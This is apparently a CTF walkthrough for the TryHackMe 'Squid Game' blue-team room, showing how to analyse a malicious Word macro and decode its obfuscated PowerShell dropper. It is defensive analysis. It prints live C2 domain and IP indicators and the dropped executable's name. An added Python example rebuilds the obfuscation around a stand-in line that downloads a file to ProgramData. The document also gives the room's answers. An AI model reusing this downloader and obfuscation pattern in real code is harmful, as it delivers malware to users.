TryHackMe: Squid Game – Attacker 1

This series of write-ups is for the TryHackMe Room Squid Game, which you can access here: https://tryhackme.com/room/squidgameroom.

This challenge room is one of the few intended for blue teams on TryHackMe, and is categorised as hard, so I thought I would give it a go. The tasks in this room are based on analysing various malicious .doc files.

The room is split into 5 attackers, and I will split this write-up into 5 separate posts going over each task.

We’ll start with Attacker 1.

Start the machine in Task 1. Once loaded, open a terminal window and navigate to the directory ~/Desktop/maldocs/. In here are 5 malicious .doc files. The file needed for Attacker 1 is attacker1.doc.

To complete this task, we’re going to be using the tools oledump, olevba, olemeta, oletimes and CyberChef.


Question 1:

What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

First of all, we’re going to use oledump, which is already installed on the THM VM. oledump is a tool for analysing OLE files. Basic knowledge of oledump is assumed for this room.

Running oledump with no options set against the file gives us information on the data streams inside it:

oledump.py attacker1.doc

There are 13 streams, one of which (stream 8) has the M marker, meaning it contains a VBA macro. We should have a look at this one first of all with the VBA decode option (-v):

oledump.py attacker1.doc -s 8 -v

In this output is a load of VBA. Skimming through it, something interesting jumps out:

I’m no VBA master, but I can see this is replacing the character [ with the character A. Something tells me this will come in useful later…

Now we need to start interrogating these streams for the strings inside them (with the -S option). The question asks for the C2 domain, so our only option at the minute is to dump the strings of each stream in turn until we come across something interesting. We work down the list, starting with stream 1:

oledump.py attacker1.doc -s 1 -S

The first stream that shows up something interesting is stream 4, which contains an obfuscated PowerShell command:

We can guess that this is base64 encoded, but it also seems to have been further obfuscated, as there are lots of [ characters. This is where the character replacement we spotted in the VBA earlier comes in handy.

To help us decode all of this, we’re going to use CyberChef. You can use the web version, or the version loaded on the THM VM.

In CyberChef, paste the PowerShell command into the input section, then add the following to the recipe:

  • Replace – simple string, [ with A
  • From Base64
  • Remove null bytes

This shows us the de-obfuscated script:

Here we can see a URI containing a domain, which is likely the C2 domain we’re looking for:

Answer
fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas

Question 2:

What executable file is the maldoc trying to drop?

We can get the answer to this question from the PowerShell script as well. Look for an executable:

Answer
QdZGP.exe

Question 3:

In what folder is it dropping the malicious executable? (hint: %Folder%)

In our de-obfuscated PowerShell script we can see where the variable $path is set:

$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";

We see the special folder location CommonApplicationData being used. A quick Google shows us that in Windows, this maps to the directory C:\ProgramData. The question asks for the answer in the format of a Windows environment path variable (wrapped in %), so the one that matches this directory is:

Answer
%ProgramData%
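As an added example (not from the room or this post), the Python below re-implements the three-step CyberChef recipe from Question 1 and then pulls out the values Questions 1 to 3 ask for. The sample script, domain and file name are constructed stand-ins, not the real attacker1.doc content; the special-folder mapping covers a few common GetFolderPath names.

```python
import base64
import re

# Constructed stand-in for the PowerShell in stream 4 (not the real attacker1.doc payload).
SAMPLE_SCRIPT = (
    '$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\\\sample.exe";'
    '(New-Object Net.WebClient).DownloadFile("http://example.invalid/stage_1/drop.php?l=demo", $path);'
)

# GetFolderPath special-folder names mapped to the %VAR% form the room asks for.
SPECIAL_FOLDERS = {"CommonApplicationData": "%ProgramData%", "ApplicationData": "%APPDATA%",
                   "LocalApplicationData": "%LOCALAPPDATA%", "UserProfile": "%USERPROFILE%"}

URL_RE = re.compile(r'https?://([^\s"\'/]+)(/[^\s"\']*)?')
EXE_RE = re.compile(r"[\w-]+\.exe\b")
FOLDER_RE = re.compile(r'GetFolderPath\("(\w+)"\)')


def obfuscate(script: str) -> str:
    """Mirror of the maldoc's transform: UTF-16LE (source of the null bytes), base64,
    then every 'A' swapped for '[' so the blob no longer decodes as-is."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", "[")


def deobfuscate(blob: str) -> str:
    """The CyberChef recipe from the write-up, step for step."""
    # Replace (simple string): '[' -> 'A', undoing the VBA's substitution.
    repaired = blob.replace("[", "A")
    # From Base64; validate=True raises binascii.Error if a stray character remains.
    raw = base64.b64decode(repaired, validate=True)
    # Remove null bytes: drops the high byte of each UTF-16LE code unit, lossless
    # only because the script is plain ASCII (decode as utf-16-le otherwise).
    return raw.replace(b"\x00", b"").decode("ascii")


def extract_indicators(script: str) -> dict:
    """Pull the values Questions 1-3 ask for: C2 URI without scheme, dropped exe, drop folder."""
    url = URL_RE.search(script)
    exe = EXE_RE.search(script)
    folder = FOLDER_RE.search(script)
    return {
        "c2": url.group(1) + (url.group(2) or "") if url else None,
        "dropped_exe": exe.group(0) if exe else None,
        "drop_folder": SPECIAL_FOLDERS.get(folder.group(1), folder.group(1)) if folder else None,
    }


SAMPLE_BLOB = obfuscate(SAMPLE_SCRIPT)  # what the analyst would paste into CyberChef's input pane
```

Running extract_indicators(deobfuscate(SAMPLE_BLOB)) yields the constructed URI without its scheme, sample.exe and %ProgramData%, the same three shapes of answer the room expects.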

Question 4:

Provide the name of the COM object the maldoc is trying to access.

The hint for this question says “check clsid field”, which is a good starting place. Googling ‘clsid’ gives this definition:

The Class ID, or CLSID, is a serial number that represents a unique ID for any application component in Windows.

Looking for a clsid in our de-obfuscated output, we can see there is a variable being set:

$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'

When Googling our GUID, you will find articles such as this one, which contain the answer:

Answer
ShellBrowserWindow

Question 5:

Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

We can see in our output an IP address, followed by a php extension:

Answer
176.32.35.16/704e.php

Question 6:

Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

We can see there are no phone numbers in the de-obfuscated script, so we will most likely have to go back to the strings for this one.

When running oledump on the stream that contains the PowerShell script, there are also some other interesting strings:

One of these matches the format given for a phone number:

Answer
213-446-1757

Question 7:

Doing some static analysis, provide the type of maldoc this is under the keyword “AutoOpen”.

This question is asking us for keywords, so for this we’re going to move onto using another tool: olevba.

olevba is a tool that, among other things, detects suspicious keywords, auto-executable macros and other IOCs.

Running olevba against our document:

olevba attacker1.doc

We can see some keywords, including one called AutoOpen; this is where our answer is:

Answer
AutoExec

Question 8:

Provide the subject for this maldoc. (make sure to remove the extra whitespace)

We’re now being asked for metadata, something we can get using another, pretty self-explanatory, tool: olemeta.

Running olemeta against the document gives us all of the metadata for the document:

olemeta attacker1.doc

In this output we’ve got our answer:

Answer
West Virginia Samanta

Question 9:

Provide the time when this document was last saved. (Format: YEAR-MONTH-DAY XX:XX:XX)

It looks like we should be able to get the answer to this question from the output of olemeta, but using the value of last_saved_date from the output above (2019-02-07 23:45:00) is not correct.

After some head scratching, it turns out we can get the correct answer using the tool oletimes, which is also pretty self-explanatory:

oletimes attacker1.doc

From this output, we can see the modification time is different to the olemeta output, and contains our answer:

Answer
2019-02-07 23:45:30

Question 10:

Provide the stream number that contains a macro.

Now we’re heading back to oledump for the last two questions. Running oledump with no options gives us:

The stream with the M marker next to it contains the macro:

Answer
8

Question 11:

Provide the name of the stream that contains a macro.

We can see the name in this output as well. The answer format doesn’t contain slashes, so they’re asking for the last part:

Answer
ThisDocument

That’s Task 2 – Attacker 1 taken care of. Next time we’ll be looking at Attacker 2.